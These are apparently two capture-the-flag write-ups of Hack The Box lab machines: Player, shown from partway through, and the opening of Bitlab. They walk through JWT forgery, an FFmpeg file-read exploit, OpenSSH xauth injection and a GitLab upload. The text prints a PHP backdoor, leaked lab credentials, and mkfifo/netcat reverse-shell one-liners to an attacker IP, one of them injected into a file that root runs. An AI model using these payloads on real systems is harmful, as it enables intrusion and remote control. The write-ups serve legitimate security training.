22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d7:30:db:b9:a0:4c:79:94:78:38:b3:43:a2:50:55:81 (DSA)
|   2048 37:2b:e4:31:ee:a6:49:0d:9f:e7:e6:01:e6:3e:0a:66 (RSA)
|   256 0c:6c:05:ed:ad:f1:75:e8:02:e4:d2:27:3e:3a:19:8f (ECDSA)
|_  256 11:b8:db:f3:cc:29:08:4a:49:ce:bf:91:73:40:a2:80 (ED25519)
80/tcp open  http    Apache httpd 2.4.7
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.12 seconds
root@kali:~/Desktop/HTB/boxes/player# 

We got http on port 80 and ssh on port 22.

Web Enumeration

I got a 403 response when I went to http://player.htb/:


I used wfuzz with subdomains-top1mil-5000.txt from seclists to enumerate virtual hosts and got these results:

root@kali:~/Desktop/HTB/boxes/player# wfuzz --hc 403 -c -w subdomains-top1mil-5000.txt -H "HOST: FUZZ.player.htb" http://10.10.10.145

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://10.10.10.145/
Total requests: 4997
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000019:   200        86 L     229 W    5243 Ch     "dev"
000000067:   200        63 L     180 W    1470 Ch     "staging"
000000070:   200        259 L    714 W    9513 Ch     "chat"

Total time: 129.1540
Processed Requests: 4997
Filtered Requests: 4994
Requests/sec.: 38.69021

root@kali:~/Desktop/HTB/boxes/player# 

I added them to my hosts file and started checking each one of them.
On dev there was an application that required credentials, so we’ll skip it until we find some:


staging was kinda empty but there was an interesting contact form:




The form was interesting because when I attempted to submit it I got a weird error for a second then I got redirected to /501.php:



I intercepted the request with burp to read the error.
Request:

GET /contact.php?firstname=test&subject=test HTTP/1.1
Host: staging.player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://staging.player.htb/contact.html
Connection: close
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Fri, 17 Jan 2020 19:54:33 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
refresh: 0;url=501.php
Vary: Accept-Encoding
Content-Length: 818
Connection: close
Content-Type: text/html

array(3) {
  [0]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(6)
    ["function"]=>
    string(1) "c"
    ["args"]=>
    array(1) {
      [0]=>
      &string(9) "Cleveland"
    }
  }
  [1]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(3)
    ["function"]=>
    string(1) "b"
    ["args"]=>
    array(1) {
      [0]=>
      &string(5) "Glenn"
    }
  }
  [2]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(11)
    ["function"]=>
    string(1) "a"
    ["args"]=>
    array(1) {
      [0]=>
      &string(5) "Peter"
    }
  }
}
Database connection failed.<html><br />Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php

The error exposed some filenames like /var/www/backup/service_config, /var/www/staging/fix.php and /var/www/staging/contact.php. That will be helpful later.
chat was a static page that simulated a chat application:


I took a quick look at the chat history between Olla and Vincent. Olla asked him about some pentest reports and he replied with 2 interesting things:



  1. Staging exposing sensitive files.
  2. Main domain exposing source code allowing to access the product before release.

We already saw that staging was exposing files. I ran gobuster on the main domain and found /launcher:

root@kali:~/Desktop/HTB/boxes/player# gobuster dir -u http://player.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://player.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/17 19:17:29 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/launcher (Status: 301)
/server-status (Status: 403)
===============================================================
2020/01/17 19:18:59 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/player# 

http://player.htb/launcher:


I tried to submit that form but it did nothing; I just got redirected to /launcher again: Request:

GET /launcher/dee8dc8a47256c64630d803a4c40786c.php HTTP/1.1
Host: player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://player.htb/launcher/index.html
Connection: close
Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IkMwQjEzN0ZFMkQ3OTI0NTlGMjZGRjc2M0NDRTQ0NTc0QTVCNUFCMDMifQ.cjGwng6JiMiOWZGz7saOdOuhyr1vad5hAxOJCiM3uzU
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 302 Found
Date: Fri, 17 Jan 2020 22:45:04 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: index.html
Content-Length: 0
Connection: close
Content-Type: text/html

We know from the chat that the source code is exposed somewhere. I wanted to read the source of /launcher/dee8dc8a47256c64630d803a4c40786c.php, so I tried some basic stuff like adding .swp, .bak and ~ after the file name. ~ worked (check this out):

root@kali:~/Desktop/HTB/boxes/player# curl http://player.htb/launcher/dee8dc8a47256c64630d803a4c40786c.php~
<?php
require 'vendor/autoload.php';

use \Firebase\JWT\JWT;

if(isset($_COOKIE["access"]))
{
        $key = '_S0_R@nd0m_P@ss_';
        $decoded = JWT::decode($_COOKIE["access"], base64_decode(strtr($key, '-_', '+/')), ['HS256']);
        if($decoded->access_code === "0E76658526655756207688271159624026011393")
        {
                header("Location: 7F2xxxxxxxxxxxxx/");
        }
        else
        {
                header("Location: index.html");
        }
}
else
{
        $token_payload = [
          'project' => 'PlayBuff',
          'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03'
        ];
        $key = '_S0_R@nd0m_P@ss_';
        $jwt = JWT::encode($token_payload, base64_decode(strtr($key, '-_', '+/')), 'HS256');
        $cookiename = 'access';
        setcookie('access',$jwt, time() + (86400 * 30), "/");
        header("Location: index.html");
}

?>
root@kali:~/Desktop/HTB/boxes/player#

It decodes the JWT token from the access cookie and redirects us to a redacted path if the value of access_code is 0E76658526655756207688271159624026011393; otherwise it assigns us an access cookie with C0B137FE2D792459F26FF763CCE44574A5B5AB03 as the access_code and redirects us to index.html.
We have the secret _S0_R@nd0m_P@ss_, so we can easily craft a valid cookie. I used jwt.io to edit my token.
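If you’d rather craft the cookie from a script instead of jwt.io, a small PyJWT sketch like the one below should produce an equivalent token (the php_b64decode helper emulates PHP’s lenient base64_decode; the exact token string may differ because of header key ordering, but the server only checks the claims and the signature):

import base64
import jwt  # PyJWT

def php_b64decode(s):
    # PHP's base64_decode() silently drops characters outside the base64
    # alphabet and tolerates missing padding; emulate that behaviour here.
    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    s = "".join(c for c in s if c in alphabet)
    return base64.b64decode(s + "=" * (-len(s) % 4))

key = php_b64decode("_S0_R@nd0m_P@ss_".replace("-", "+").replace("_", "/"))
token = jwt.encode(
    {"project": "PlayBuff",
     "access_code": "0E76658526655756207688271159624026011393"},
    key,
    algorithm="HS256",
)
print(token)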




I used the cookie and got redirected to /7F2dcsSdZo6nj3SNMTQ1: Request:

GET /launcher/dee8dc8a47256c64630d803a4c40786c.php HTTP/1.1
Host: player.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://player.htb/launcher/index.html
Connection: close
Cookie: access=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 302 Found
Date: Fri, 17 Jan 2020 22:50:59 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: 7F2dcsSdZo6nj3SNMTQ1/
Content-Length: 0
Connection: close
Content-Type: text/html




FFmpeg HLS Vulnerability –> Arbitrary File Read

I uploaded a test txt file:



I got an avi file as a result which was weird:

<a href="http:\/\/player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/uploads/518515582.avi">

I tried some other file formats and also got an avi file back.
So I tried the ffmpeg HLS exploit: I created a test avi to read /etc/passwd and it worked:

root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///etc/passwd test.avi
root@kali:~/Desktop/HTB/boxes/player/avi# file test.avi 
test.avi: RIFF (little-endian) data, AVI, 224 x 160, 25.00 fps,
root@kali:~/Desktop/HTB/boxes/player/avi#




I created 3 more avis to read the files we got earlier from the error message from staging:

root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///var/www/staging/contact.php contact.avi
root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///var/www/backup/service_config service_config.avi
root@kali:~/Desktop/HTB/boxes/player/avi# ./gen_xbin_avi.py file:///var/www/staging/fix.php fix.avi
root@kali:~/Desktop/HTB/boxes/player/avi#

contact.php didn’t have anything interesting and the avi for fix.php was empty for some reason. In service_config there were some credentials for a user called telegen:


I tried these credentials with ssh and with dev.player.htb and they didn’t work. I ran a quick full port scan with masscan and it turned out that there was another open port:

root@kali:~/Desktop/HTB/boxes/player# masscan -p1-65535 10.10.10.145 --rate=1000 -e tun0

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-18 00:09:24 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.145                                    
Discovered open port 80/tcp on 10.10.10.145                                    
Discovered open port 6686/tcp on 10.10.10.145

I scanned that port with nmap but it couldn’t identify the service:

PORT     STATE SERVICE    VERSION
6686/tcp open  tcpwrapped

However when I connected to the port with nc the banner indicated that it was an ssh server:

root@kali:~/Desktop/HTB/boxes/player# nc player.htb 6686
SSH-2.0-OpenSSH_7.2

Protocol mismatch.
root@kali:~/Desktop/HTB/boxes/player#

I could log in to that ssh server with the credentials, but unfortunately I was in a restricted environment:

root@kali:~/Desktop/HTB/boxes/player# ssh [email protected] -p 6686
The authenticity of host '[player.htb]:6686 ([10.10.10.145]:6686)' can't be established.
ECDSA key fingerprint is SHA256:oAcCXvit3SHvyq7nuvWntLq+Q+mGlAg8301zhKnJmPM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[player.htb]:6686,[10.10.10.145]:6686' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Last login: Tue Apr 30 18:40:13 2019 from 192.168.0.104
Environment:
  USER=telegen
  LOGNAME=telegen
  HOME=/home/telegen
  PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
  MAIL=/var/mail/telegen
  SHELL=/usr/bin/lshell
  SSH_CLIENT=10.10.xx.xx 43270 6686
  SSH_CONNECTION=10.10.xx.xx 43270 10.10.10.145 6686
  SSH_TTY=/dev/pts/4
  TERM=screen
========= PlayBuff ==========
Welcome to Staging Environment

telegen:~$ whoami
*** forbidden command: whoami
telegen:~$ help
  clear  exit  help  history  lpath  lsudo
telegen:~$ lsudo
Allowed sudo commands:
telegen:~$ lpath
Allowed:
 /home/telegen
telegen:~$ pwd
*** forbidden command: pwd
telegen:~$ 

OpenSSH 7.2p1 xauth Command Injection –> User Flag

When I searched for exploits for that version of openssh I found this exploit.

root@kali:~/Desktop/HTB/boxes/player# python 39569.py 
 Usage: <host> <port> <username> <password or path_to_privkey>
        
        path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
        

root@kali:~/Desktop/HTB/boxes/player# python 39569.py player.htb 6686 telegen 'd-bC|jC!2uepS/w'
INFO:__main__:connecting to: telegen:d-bC|jC!2uepS/[email protected]:6686
INFO:__main__:connected!
INFO:__main__:
Available commands:
    .info
    .readfile <path>
    .writefile <path> <data>
    .exit .quit
    <any xauth command or type help>

#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
telegen:x:1000:1000:telegen,,,:/home/telegen:/usr/bin/lshell
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL
colord:x:106:116:colord
staged-dev:x:4000000000:1001::/home/staged-dev:/bin/sh
#> 

I tried to use .writefile to write a php file and get a reverse shell, but I couldn’t. Anyway, I was finally able to read the user flag:


Credentials in fix.php –> RCE –> Shell as www-data

Earlier I couldn’t read fix.php through the ffmpeg exploit, but I was able to read it as telegen, and I found credentials for a user called peter:

#> .readfile /var/www/staging/fix.php                                    
DEBUG:__main__:auth_cookie: 'xxxx\nsource /var/www/staging/fix.php\n'          
DEBUG:__main__:dummy exec returned: None
INFO:__main__:<?php       
class                            
protected                                          
protected                                      
protected                                      
public                                       
return                                          
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
if($result
static::failed($test_name);
}
static::passed($test_name);
}
}
public
if(!$username){
$username
$password
}
//modified
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
echo
echo
echo
}
private
echo
static::$failed++;
}
private
static::character(".");
static::$passed++;
}
private
echo
static::$last_echoed
}
private
if(static::$last_echoed
echo
static::$last_echoed
}
}
#> 

These credentials (peter : CQXpm\z)G5D#%S$y=) worked with dev.player.htb:



I tried to create a new project in /var/www/html:


But I got an error saying that I was only allowed to create projects in /var/www/demo/home so I created a project there:


When I ran gobuster on http://dev.player.htb/ there was a directory called home:

root@kali:~/Desktop/HTB/boxes/player# gobuster dir -u http://dev.player.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://dev.player.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/17 20:18:00 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/components (Status: 301)
/data (Status: 301)
/favicon.ico (Status: 200)
/home (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/languages (Status: 301)
/lib (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/themes (Status: 301)
===============================================================
2020/01/17 20:19:49 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/player# 

I wanted to see if that was related to /var/www/demo/home so I created a file called test.php that echoed test and I tried to access it through /home:



It worked so I edited my test file and added the php-simple-backdoor code and got a reverse shell:



root@kali:~/Desktop/HTB/boxes/player# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.145] 56714
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@player:/var/www/demo/home$ ^Z
[1]+  Stopped                 nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/player# stty raw -echo
root@kali:~/Desktop/HTB/boxes/player# nc -lvnp 1337

www-data@player:/var/www/demo/home$ export TERM=screen
www-data@player:/var/www/demo/home$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@player:/var/www/demo/home$ 

Root Flag

When I ran pspy to monitor the processes I noticed that /var/lib/playbuff/buff.php was executed as root periodically:

2020/01/18 05:25:02 CMD: UID=0    PID=3650   | /usr/bin/php /var/lib/playbuff/buff.php 

I couldn’t write to it but it included another php file which I could write to (/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php):

www-data@player:/tmp$ cd /var/lib/playbuff/
www-data@player:/var/lib/playbuff$ cat buff.php 
<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
        public $logFile="/var/log/playbuff/logs.txt";
        public $logData="Updated";

        public function __wakeup()
        {
                file_put_contents(__DIR__."/".$this->logFile,$this->logData);
        }
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data))
{
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success with serialized logs!';
        }
}
else
{
        file_put_contents("/var/lib/playbuff/merge.log","no issues yet");
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success!';
        }
}
?>
www-data@player:/var/lib/playbuff$ 

I put my reverse shell payload in /tmp and added a line to /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php that executed it:

www-data@player:/$ cat /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
<?php
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "integrity";

system("bash -c /tmp/pwned.sh");

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
?>
www-data@player:/$ cat /tmp/pwned.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1338 >/tmp/f
www-data@player:/$ 




And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it and follow me on twitter @Ahm3d_H3sham.
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Bitlab
Next Hack The Box write-up : Hack The Box - AI

Hack The Box - Bitlab

By: 0xRick
11 January 2020 at 05:00

Hack The Box - Bitlab

Quick Summary

Hey guys, today Bitlab retired and here’s my write-up about it. It was a nice CTF-style machine that mainly involved a direct file upload and a simple reverse engineering challenge. It’s a Linux box and its IP is 10.10.10.114; I added it to /etc/hosts as bitlab.htb. Let’s jump right in!




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/bitlab# nmap -sV -sT -sC -o nmapinitial bitlab.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 13:44 EST
Nmap scan report for bitlab.htb (10.10.10.114)
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://bitlab.htb/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.56 seconds
root@kali:~/Desktop/HTB/boxes/bitlab# 

We got http on port 80 and ssh on port 22. robots.txt existed on the web server and had a lot of entries.

Web Enumeration

Gitlab was running on the web server and we needed credentials:


I checked /robots.txt to see if there was anything interesting:

root@kali:~/Desktop/HTB/boxes/bitlab# curl http://bitlab.htb/robots.txt                                                                                                                                                             [18/43]
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file                                                                                                                                          
#                                                                                                                                                                                                                                          
# To ban all spiders from the entire site uncomment the next two lines:                                                                                                                                                                    
# User-Agent: *                                                                                                                                                                                                                            
# Disallow: /                                                                                                                                                                                                                              
                                                                                                                                                                                                                                           
# Add a 1 second delay between successive requests to the same server, limits resources used by crawler                                                                                                                                    
# Only some crawlers respect this setting, e.g. Googlebot does not                                                                                                                                                                         
# Crawl-delay: 1                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
# Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application                                                        
User-Agent: *                                                                                                                                                                                                                              
Disallow: /autocomplete/users                                                                                                                                                                                                              
Disallow: /search                                                                                                                                                                                                                          
Disallow: /api                                                                                                                                                                                                                             
Disallow: /admin                                                                                                                                                                                                                           
Disallow: /profile                                                                                                                                                                                                                         
Disallow: /dashboard                                                                                                                                                                                                                       
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in

# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw

# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/
Disallow: /*/-/group_members
Disallow: /*/project_members
root@kali:~/Desktop/HTB/boxes/bitlab#

Most of the disallowed entries were paths related to the Gitlab application. I checked /help and found a page called bookmarks.html:


There was an interesting link called Gitlab Login:


Clicking on that link didn’t do anything, so I checked the source of the page; the href attribute contained some javascript code:

        <DT><A HREF="javascript:(function(){ var _0x4b18=[&quot;\x76\x61\x6C\x75\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6C\x61\x76\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64&quot;,&quot;\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78&quot;];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()" ADD_DATE="1554932142">Gitlab Login</A>

I took that code, edited it a little bit and used the js console to execute it:

root@kali:~/Desktop/HTB/boxes/bitlab# js
> var _0x4b18=['\x76\x61\x6C\x75\x65','\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E','\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64','\x63\x6C\x61\x76\x65','\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64','\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78'];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];
Thrown:
ReferenceError: document is not defined
>

Then I printed the variable _0x4b18 which had the credentials for Gitlab:

> _0x4b18
[ 'value',
  'user_login',
  'getElementById',
  'clave',
  'user_password',
  '11des0081x' ]
> 
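
As a side note, you can decode those escaped strings without touching a browser or the js console; a tiny Python sketch (my own, not part of the bookmarklet) does the same thing, since Python interprets the same \xNN escapes in string literals:

#!/usr/bin/python3
# decode the \xNN-escaped strings from the bookmarklet;
# Python applies the same escapes when parsing the string literals
escaped = [
    "\x76\x61\x6C\x75\x65",
    "\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E",
    "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
    "\x63\x6C\x61\x76\x65",
    "\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64",
    "\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78",
]
for s in escaped:
    print(s)

Running it prints the same six strings: value, user_login, getElementById, clave, user_password and 11des0081x.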

File Upload –> RCE –> Shell as www-data

After logging in with the credentials (clave : 11des0081x) I found two repositories, Profile and Deployer:



I also checked the snippets and I found an interesting code snippet that had the database credentials which will be useful later:



<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");

Back to the repositories, I checked Profile and it was pretty empty:


The path /profile was one of the disallowed entries in /robots.txt. I wanted to check if that path was related to the repository, so I checked if the same image (developer.jpg) existed there, and it did:



Now we can simply upload a PHP shell and access it through /profile. I uploaded the php-simple-backdoor:

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->







Then I merged it to the master branch:





I used the netcat OpenBSD reverse shell payload from PayloadsAllTheThings to get a shell; I had to URL-encode it first:

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.xx.xx%201337%20%3E%2Ftmp%2Ff
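
For reference, the encoding is nothing more than standard percent-encoding; a quick Python sketch (just an illustration, not something I ran on the box) reproduces it:

#!/usr/bin/python3
# URL-encode the reverse shell payload; safe="" also encodes the slashes
from urllib.parse import quote

payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f"
print(quote(payload, safe=""))

The encoded string is what gets passed to the backdoor’s cmd parameter, and the listener below caught the shell: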
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.114] 44340
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@bitlab:/var/www/html/profile$ ^Z
[1]+  Stopped                 nc -lvnp 1337
